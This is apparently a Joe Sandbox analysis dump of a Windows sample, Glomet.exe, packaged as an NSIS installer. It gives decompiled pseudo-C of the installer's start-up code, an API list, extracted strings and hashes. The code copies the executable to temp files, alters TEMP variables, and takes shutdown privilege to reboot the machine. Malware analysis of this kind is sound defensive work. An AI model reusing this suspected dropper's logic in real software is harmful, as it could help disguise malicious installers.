	void _t179;
	void* _t198;
	void* _t199;
	signed char* _t213;
	CHAR* _t217;
	CHAR* _t218;
	void* _t223;

	_v20 = 0;
	_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
	_v12 = 0;
	_v16 = 0x20;
	SetErrorMode(0x8001); // executed
	_v196.szCSDVersion = 0;
	_v48 = 0;
	_v44 = 0;
	_v196.dwOSVersionInfoSize = 0x9c;
	if(GetVersionExA( &_v196) != 0) {
		L3:
		_t223 = _v196.dwPlatformId - 2;
		L4:
		if(_t223 < 0) {
			_v42 = _v42 & 0x00000000;
			if(_v175 < 0x41) {
				_v48 = 0;
			} else {
				_v48 = _v175 - 0x40;
			}
		}
		if(_v196.dwMajorVersion < 0xa) {
			_v182 = _v182 & 0x00000000;
		}
		 *0x42f4d8 = _v196.dwBuildNumber;
		 *0x42f4dc = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
		if( *0x42f4de != 0x600) {
			_t159 = E00406663(0);
			if(_t159 != 0) {
				 *_t159(0xc00);
			}
		}
		_t217 = "UXTHEME";
		goto L14;
		while(1) {
			L37:
			_t179 =  *_t95;
			_t234 = _t179;
			if(_t179 == 0) {
				break;
			}
			__eflags = _t179 - 0x20;
			if(_t179 != 0x20) {
				L23:
				__eflags =  *_t95 - 0x22;
				_v16 = 0x20;
				if( *_t95 == 0x22) {
					_t95 = _t95 + 1;
					__eflags = _t95;
					_v16 = 0x22;
				}
				__eflags =  *_t95 - 0x2f;
				if( *_t95 != 0x2f) {
					L35:
					_t95 = E00405C14(_t95, _v16);
					__eflags =  *_t95 - 0x22;
					if(__eflags == 0) {
						_t95 = _t95 + 1;
						__eflags = _t95;
					}
					continue;
				} else {
					_t95 = _t95 + 1;
					__eflags =  *_t95 - 0x53;
					if( *_t95 != 0x53) {
						L30:
						__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
						if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
							L34:
							__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
							if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
								 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
								__eflags = _t95 + 2;
								E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens", _t95 + 2);
								L40:
								_t218 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t218); // executed
								_t99 = E00403382(_t234);
								_t235 = _t99;
								if(_t99 != 0) {
									L43:
									DeleteFileA("1033"); // executed
									_t101 = E00402F0C(_t237, _v12); // executed
									_v8 = _t101;
									if(_t101 != 0) {
                                                                                                                                                                              													L53:
                                                                                                                                                                              													E00403963();
                                                                                                                                                                              													__imp__OleUninitialize();
                                                                                                                                                                              													_t248 = _v8;
                                                                                                                                                                              													if(_v8 == 0) {
                                                                                                                                                                              														__eflags =  *0x42f4b4;
                                                                                                                                                                              														if( *0x42f4b4 == 0) {
                                                                                                                                                                              															L77:
                                                                                                                                                                              															_t103 =  *0x42f4cc;
                                                                                                                                                                              															__eflags = _t103 - 0xffffffff;
                                                                                                                                                                              															if(_t103 != 0xffffffff) {
                                                                                                                                                                              																_v20 = _t103;
                                                                                                                                                                              															}
                                                                                                                                                                              															ExitProcess(_v20);
                                                                                                                                                                              														}
                                                                                                                                                                              														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
                                                                                                                                                                              														__eflags = _t106;
                                                                                                                                                                              														if(_t106 != 0) {
                                                                                                                                                                              															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
                                                                                                                                                                              															_v40.PrivilegeCount = 1;
                                                                                                                                                                              															_v28 = 2;
                                                                                                                                                                              															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
                                                                                                                                                                              														}
                                                                                                                                                                              														_t107 = E00406663(4);
                                                                                                                                                                              														__eflags = _t107;
                                                                                                                                                                              														if(_t107 == 0) {
                                                                                                                                                                              															L75:
                                                                                                                                                                              															_t108 = ExitWindowsEx(2, 0x80040002);
                                                                                                                                                                              															__eflags = _t108;
                                                                                                                                                                              															if(_t108 != 0) {
                                                                                                                                                                              																goto L77;
                                                                                                                                                                              															}
                                                                                                                                                                              															goto L76;
                                                                                                                                                                              														} else {
                                                                                                                                                                              															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
                                                                                                                                                                              															__eflags = _t110;
                                                                                                                                                                              															if(_t110 == 0) {
                                                                                                                                                                              																L76:
                                                                                                                                                                              																E0040140B(9);
                                                                                                                                                                              																goto L77;
                                                                                                                                                                              															}
                                                                                                                                                                              															goto L75;
                                                                                                                                                                              														}
                                                                                                                                                                              													}
                                                                                                                                                                              													E0040596D(_v8, 0x200010);
                                                                                                                                                                              													ExitProcess(2);
                                                                                                                                                                              												}
                                                                                                                                                                              												if( *0x42f43c == _t101) {
                                                                                                                                                                              													L52:
                                                                                                                                                                              													 *0x42f4cc =  *0x42f4cc | 0xffffffff;
                                                                                                                                                                              													_v20 = E00403A3D( *0x42f4cc);
                                                                                                                                                                              													goto L53;
                                                                                                                                                                              												}
                                                                                                                                                                              												_t213 = E00405C14(_t171, _t101);
                                                                                                                                                                              												if(_t213 < _t171) {
                                                                                                                                                                              													L49:
                                                                                                                                                                              													_t244 = _t213 - _t171;
                                                                                                                                                                              													_v8 = "Error launching installer";
                                                                                                                                                                              													if(_t213 < _t171) {
                                                                                                                                                                              														_t173 = E004058D8(_t248);
                                                                                                                                                                              														lstrcatA(_t218, "~nsu");
                                                                                                                                                                              														if(_t173 != 0) {
                                                                                                                                                                              															lstrcatA(_t218, "A");
                                                                                                                                                                              														}
                                                                                                                                                                              														lstrcatA(_t218, ".tmp");
                                                                                                                                                                              														_t211 = "C:\\programdata";
                                                                                                                                                                              														if(lstrcmpiA(_t218, "C:\\programdata") != 0) {
                                                                                                                                                                              															_push(_t218);
                                                                                                                                                                              															if(_t173 == 0) {
                                                                                                                                                                              																E004058BB();
                                                                                                                                                                              															} else {
                                                                                                                                                                              																E0040583E();
                                                                                                                                                                              															}
                                                                                                                                                                              															SetCurrentDirectoryA(_t218);
                                                                                                                                                                              															if("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens" == 0) {
                                                                                                                                                                              																E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens", _t211);
                                                                                                                                                                              															}
                                                                                                                                                                              															E00406257(0x430000, _v24);
                                                                                                                                                                              															_t194 = "A";
                                                                                                                                                                              															_v12 = 0x1a;
                                                                                                                                                                              															 *0x430400 = "A";
                                                                                                                                                                              															do {
                                                                                                                                                                              																E004062EA(_t173, 0x429450, _t218, 0x429450,  *((intOrPtr*)( *0x42f430 + 0x120)));
                                                                                                                                                                              																DeleteFileA(0x429450);
                                                                                                                                                                              																_t173 = 0;
                                                                                                                                                                              																if(_v8 != 0 && CopyFileA("C:\\programdata\\Glomet.exe", 0x429450, 1) != 0) {
                                                                                                                                                                              																	E00406030(_t194, 0x429450, 0);
                                                                                                                                                                              																	E004062EA(0, 0x429450, _t218, 0x429450,  *((intOrPtr*)( *0x42f430 + 0x124)));
                                                                                                                                                                              																	_t134 = E004058F0(0x429450);
                                                                                                                                                                              																	if(_t134 != 0) {
                                                                                                                                                                              																		CloseHandle(_t134);
                                                                                                                                                                              																		_v8 = 0;
                                                                                                                                                                              																	}
                                                                                                                                                                              																}
                                                                                                                                                                              																 *0x430400 =  *0x430400 + 1;
                                                                                                                                                                              																_t62 =  &_v12;
                                                                                                                                                                              																 *_t62 = _v12 - 1;
                                                                                                                                                                              															} while ( *_t62 != 0);
                                                                                                                                                                              															E00406030(_t194, _t218, _t173);
                                                                                                                                                                              														}
                                                                                                                                                                              														goto L53;
                                                                                                                                                                              													}
                                                                                                                                                                              													 *_t213 =  *_t213 & 0x00000000;
                                                                                                                                                                              													_t214 =  &(_t213[4]);
                                                                                                                                                                              													if(E00405CD7(_t244,  &(_t213[4])) == 0) {
                                                                                                                                                                              														goto L53;
                                                                                                                                                                              													}
                                                                                                                                                                              													E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens", _t214);
                                                                                                                                                                              													E00406257("C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens\\Lektionskatalogets1", _t214);
                                                                                                                                                                              													_v8 = _v8 & 0x00000000;
                                                                                                                                                                              													goto L52;
                                                                                                                                                                              												}
                                                                                                                                                                              												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                                                                                                                                              												while( *_t213 != _t150) {
                                                                                                                                                                              													_t213 = _t213 - 1;
                                                                                                                                                                              													if(_t213 >= _t171) {
                                                                                                                                                                              														continue;
                                                                                                                                                                              													}
                                                                                                                                                                              													goto L49;
                                                                                                                                                                              												}
                                                                                                                                                                              												goto L49;
                                                                                                                                                                              											}
                                                                                                                                                                              											GetWindowsDirectoryA(_t218, 0x3fb);
                                                                                                                                                                              											lstrcatA(_t218, "\\Temp");
                                                                                                                                                                              											_t153 = E00403382(_t235);
                                                                                                                                                                              											_t236 = _t153;
                                                                                                                                                                              											if(_t153 != 0) {
                                                                                                                                                                              												goto L43;
                                                                                                                                                                              											}
                                                                                                                                                                              											GetTempPathA(0x3fc, _t218);
                                                                                                                                                                              											lstrcatA(_t218, "Low");
                                                                                                                                                                              											SetEnvironmentVariableA("TEMP", _t218);
                                                                                                                                                                              											SetEnvironmentVariableA("TMP", _t218);
                                                                                                                                                                              											_t158 = E00403382(_t236);
                                                                                                                                                                              											_t237 = _t158;
                                                                                                                                                                              											if(_t158 == 0) {
                                                                                                                                                                              												goto L53;
                                                                                                                                                                              											}
                                                                                                                                                                              											goto L43;
                                                                                                                                                                              										}
                                                                                                                                                                              										goto L35;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t198 =  *((intOrPtr*)(_t95 + 4));
                                                                                                                                                                              									__eflags = _t198 - 0x20;
                                                                                                                                                                              									if(_t198 == 0x20) {
                                                                                                                                                                              										L33:
                                                                                                                                                                              										_t42 =  &_v12;
                                                                                                                                                                              										 *_t42 = _v12 | 0x00000004;
                                                                                                                                                                              										__eflags =  *_t42;
                                                                                                                                                                              										goto L34;
                                                                                                                                                                              									}
                                                                                                                                                                              									__eflags = _t198;
                                                                                                                                                                              									if(_t198 != 0) {
                                                                                                                                                                              										goto L34;
                                                                                                                                                                              									}
                                                                                                                                                                              									goto L33;
                                                                                                                                                                              								}
                                                                                                                                                                              								_t199 =  *(_t95 + 1);
                                                                                                                                                                              								__eflags = _t199 - 0x20;
                                                                                                                                                                              								if(_t199 == 0x20) {
                                                                                                                                                                              									L29:
                                                                                                                                                                              									 *0x42f4c0 = 1;
                                                                                                                                                                              									goto L30;
                                                                                                                                                                              								}
                                                                                                                                                                              								__eflags = _t199;
                                                                                                                                                                              								if(_t199 != 0) {
                                                                                                                                                                              									goto L30;
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L29;
                                                                                                                                                                              							}
                                                                                                                                                                              						} else {
                                                                                                                                                                              							goto L22;
                                                                                                                                                                              						}
                                                                                                                                                                              						do {
                                                                                                                                                                              							L22:
                                                                                                                                                                              							_t95 = _t95 + 1;
                                                                                                                                                                              							__eflags =  *_t95 - 0x20;
                                                                                                                                                                              						} while ( *_t95 == 0x20);
                                                                                                                                                                              						goto L23;
                                                                                                                                                                              					}
                                                                                                                                                                              					goto L40;
                                                                                                                                                                              					L14:
                                                                                                                                                                              					E004065F5(_t217); // executed
                                                                                                                                                                              					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
                                                                                                                                                                              					if( *_t217 != 0) {
                                                                                                                                                                              						goto L14;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						E00406663(0xb);
                                                                                                                                                                              						 *0x42f424 = E00406663(9);
                                                                                                                                                                              						_t87 = E00406663(7);
                                                                                                                                                                              						if(_t87 != 0) {
                                                                                                                                                                              							_t87 =  *_t87(0x1e);
                                                                                                                                                                              							if(_t87 != 0) {
                                                                                                                                                                              								 *0x42f4dc =  *0x42f4dc | 0x00000080;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						__imp__#17(_t170);
                                                                                                                                                                              						__imp__OleInitialize(0); // executed
                                                                                                                                                                              						 *0x42f4e0 = _t87;
                                                                                                                                                                              						SHGetFileInfoA(0x429850, 0,  &_v548, 0x160, 0); // executed
                                                                                                                                                                              						E00406257("ARBEJDSTILLADELSER Setup", "NSIS Error");
                                                                                                                                                                              						_t91 = GetCommandLineA();
                                                                                                                                                                              						_t171 = "\"C:\\programdata\\Glomet.exe\" ";
                                                                                                                                                                              						E00406257(_t171, _t91);
                                                                                                                                                                              						 *0x42f420 = 0x400000;
                                                                                                                                                                              						_t93 = _t171;
                                                                                                                                                                              						if("\"C:\\programdata\\Glomet.exe\" " == 0x22) {
                                                                                                                                                                              							_v16 = 0x22;
                                                                                                                                                                              							_t93 =  &M00435001;
                                                                                                                                                                              						}
                                                                                                                                                                              						_t95 = CharNextA(E00405C14(_t93, _v16));
                                                                                                                                                                              						_v24 = _t95;
                                                                                                                                                                              						goto L37;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				_v196.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                              				GetVersionExA( &_v196);
                                                                                                                                                                              				if(_v196.dwPlatformId != 2) {
                                                                                                                                                                              					goto L4;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_v42 = 4;
                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                              					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
                                                                                                                                                                              					goto L3;
                                                                                                                                                                              				}
                                                                                                                                                                              			}












































                                                                                                                                                                              0x00403955
                                                                                                                                                                              0x00403957
                                                                                                                                                                              0x00403957
                                                                                                                                                                              0x0040395d
                                                                                                                                                                              0x0040395d
                                                                                                                                                                              0x004038e4
                                                                                                                                                                              0x004038ea
                                                                                                                                                                              0x004038ec
                                                                                                                                                                              0x004038f8
                                                                                                                                                                              0x00403909
                                                                                                                                                                              0x00403910
                                                                                                                                                                              0x00403917
                                                                                                                                                                              0x00403917
                                                                                                                                                                              0x0040391f
                                                                                                                                                                              0x00403924
                                                                                                                                                                              0x0040392b
                                                                                                                                                                              0x00403939
                                                                                                                                                                              0x0040393c
                                                                                                                                                                              0x00403942
                                                                                                                                                                              0x00403944
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040392d
                                                                                                                                                                              0x00403933
                                                                                                                                                                              0x00403935
                                                                                                                                                                              0x00403937
                                                                                                                                                                              0x00403946
                                                                                                                                                                              0x00403948
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403948
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403937
                                                                                                                                                                              0x0040392b
                                                                                                                                                                              0x004037b4
                                                                                                                                                                              0x004037bb
                                                                                                                                                                              0x004037bb
                                                                                                                                                                              0x0040370e
                                                                                                                                                                              0x00403786
                                                                                                                                                                              0x00403786
                                                                                                                                                                              0x00403792
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403792
                                                                                                                                                                              0x00403717
                                                                                                                                                                              0x0040371b
                                                                                                                                                                              0x00403751
                                                                                                                                                                              0x00403751
                                                                                                                                                                              0x00403753
                                                                                                                                                                              0x0040375a
                                                                                                                                                                              0x004037cc
                                                                                                                                                                              0x004037ce
                                                                                                                                                                              0x004037d5
                                                                                                                                                                              0x004037dd
                                                                                                                                                                              0x004037dd
                                                                                                                                                                              0x004037e8
                                                                                                                                                                              0x004037ed
                                                                                                                                                                              0x004037fc
                                                                                                                                                                              0x00403800
                                                                                                                                                                              0x00403801
                                                                                                                                                                              0x0040380a
                                                                                                                                                                              0x00403803
                                                                                                                                                                              0x00403803
                                                                                                                                                                              0x00403803
                                                                                                                                                                              0x00403810
                                                                                                                                                                              0x0040381d
                                                                                                                                                                              0x00403825
                                                                                                                                                                              0x00403825
                                                                                                                                                                              0x00403832
                                                                                                                                                                              0x00403837
                                                                                                                                                                              0x00403841
                                                                                                                                                                              0x00403855
                                                                                                                                                                              0x0040385b
                                                                                                                                                                              0x00403867
                                                                                                                                                                              0x0040386d
                                                                                                                                                                              0x00403873
                                                                                                                                                                              0x00403878
                                                                                                                                                                              0x0040388e
                                                                                                                                                                              0x0040389f
                                                                                                                                                                              0x004038a5
                                                                                                                                                                              0x004038ac
                                                                                                                                                                              0x004038af
                                                                                                                                                                              0x004038b5
                                                                                                                                                                              0x004038b5
                                                                                                                                                                              0x004038ac
                                                                                                                                                                              0x004038b8
                                                                                                                                                                              0x004038be
                                                                                                                                                                              0x004038be
                                                                                                                                                                              0x004038be
                                                                                                                                                                              0x004038c5
                                                                                                                                                                              0x004038c5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004037fc
                                                                                                                                                                              0x0040375c
                                                                                                                                                                              0x0040375f
                                                                                                                                                                              0x0040376a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403772
                                                                                                                                                                              0x0040377d
                                                                                                                                                                              0x00403782
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403782
                                                                                                                                                                              0x00403746
                                                                                                                                                                              0x00403748
                                                                                                                                                                              0x0040374c
                                                                                                                                                                              0x0040374f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040374f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403748
                                                                                                                                                                              0x0040369a
                                                                                                                                                                              0x004036a6
                                                                                                                                                                              0x004036ab
                                                                                                                                                                              0x004036b0
                                                                                                                                                                              0x004036b2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004036ba
                                                                                                                                                                              0x004036c2
                                                                                                                                                                              0x004036d3
                                                                                                                                                                              0x004036db
                                                                                                                                                                              0x004036dd
                                                                                                                                                                              0x004036e2
                                                                                                                                                                              0x004036e4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004036e4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403649
                                                                                                                                                                              0x0040360b
                                                                                                                                                                              0x0040360e
                                                                                                                                                                              0x00403611
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403617
                                                                                                                                                                              0x00403613
                                                                                                                                                                              0x00403615
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403615
                                                                                                                                                                              0x004035c6
                                                                                                                                                                              0x004035c9
                                                                                                                                                                              0x004035cc
                                                                                                                                                                              0x004035d2

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                                                                                                                                              • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                                                                                                                                              • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                                                                                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403523
                                                                                                                                                                              • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                                                                                                                                              • GetCommandLineA.KERNEL32(ARBEJDSTILLADELSER Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                                                                                                                                              • CharNextA.USER32(00000000,"C:\programdata\Glomet.exe" ,00000020,"C:\programdata\Glomet.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403590
                                                                                                                                                                              • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403689
                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040369A
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                                                                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036BA
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                                                                                                              • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036EF
                                                                                                                                                                              • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 0040379A
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004037BB
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A14C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                                                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\programdata,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\programdata\Glomet.exe" ,00000000,?,?,00000007,00000009,0000000B), ref: 004037F4
                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403810
                                                                                                                                                                              • DeleteFileA.KERNEL32(00429450,00429450,?,00430000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                                                                                                                                              • CopyFileA.KERNEL32(C:\programdata\Glomet.exe,00429450,00000001), ref: 00403882
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00429450,00429450,?,00429450,00000000,?,00000007,00000009,0000000B), ref: 004038AF
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040395D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                              • String ID: "$"C:\programdata\Glomet.exe" $.tmp$1033$A$ARBEJDSTILLADELSER Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1$C:\programdata$C:\programdata\Glomet.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                              • API String ID: 1000954069-1385142115
                                                                                                                                                                              • Opcode ID: 7c630d5b1c8c78dc8f49951f734bd62ae9556d55dda655a8d4d406bedb351979
                                                                                                                                                                              • Instruction ID: 223053d6f2ec0cc509bcc84454fcb5a587f3d9304b07d6be13cf3966b97333d0
                                                                                                                                                                              • Opcode Fuzzy Hash: 7c630d5b1c8c78dc8f49951f734bd62ae9556d55dda655a8d4d406bedb351979
                                                                                                                                                                              • Instruction Fuzzy Hash: DCE1F470904354AADB21AF759D49B6F7EB8AF4570AF0440BFE441B62D2CB7C4A05CB2E
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                              			E004054B6(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                              				void* _v32;
                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                              				int _v40;
                                                                                                                                                                              				int _v44;
                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                              				int _v52;
                                                                                                                                                                              				void* _v56;
                                                                                                                                                                              				void* _v64;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				struct HWND__* _t87;
                                                                                                                                                                              				struct HWND__* _t89;
                                                                                                                                                                              				long _t90;
                                                                                                                                                                              				int _t95;
                                                                                                                                                                              				int _t96;
                                                                                                                                                                              				long _t99;
                                                                                                                                                                              				void* _t102;
                                                                                                                                                                              				intOrPtr _t113;
                                                                                                                                                                              				void* _t121;
                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                              				struct HWND__* _t128;
                                                                                                                                                                              				int _t150;
                                                                                                                                                                              				int _t153;
                                                                                                                                                                              				long _t157;
                                                                                                                                                                              				struct HWND__* _t161;
                                                                                                                                                                              				struct HMENU__* _t163;
                                                                                                                                                                              				long _t165;
                                                                                                                                                                              				void* _t166;
                                                                                                                                                                              				char* _t167;
                                                                                                                                                                              				char* _t168;
                                                                                                                                                                              				int _t169;
                                                                                                                                                                              
                                                                                                                                                                              				_t87 =  *0x42ec04; // 0x20378
                                                                                                                                                                              				_t157 = _a8;
                                                                                                                                                                              				_t150 = 0;
                                                                                                                                                                              				_v8 = _t87;
                                                                                                                                                                              				if(_t157 != 0x110) {
                                                                                                                                                                              					__eflags = _t157 - 0x405;
                                                                                                                                                                              					if(_t157 == 0x405) {
                                                                                                                                                                              						_t121 = CreateThread(0, 0, E0040544A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                                                                                                                                                              						FindCloseChangeNotification(_t121);
                                                                                                                                                                              					}
                                                                                                                                                                              					__eflags = _t157 - 0x111;
                                                                                                                                                                              					if(_t157 != 0x111) {
                                                                                                                                                                              						L17:
                                                                                                                                                                              						__eflags = _t157 - 0x404;
                                                                                                                                                                              						if(_t157 != 0x404) {
                                                                                                                                                                              							L25:
                                                                                                                                                                              							__eflags = _t157 - 0x7b;
                                                                                                                                                                              							if(_t157 != 0x7b) {
                                                                                                                                                                              								goto L20;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t89 = _v8;
                                                                                                                                                                              							__eflags = _a12 - _t89;
                                                                                                                                                                              							if(_a12 != _t89) {
                                                                                                                                                                              								goto L20;
                                                                                                                                                                              							}
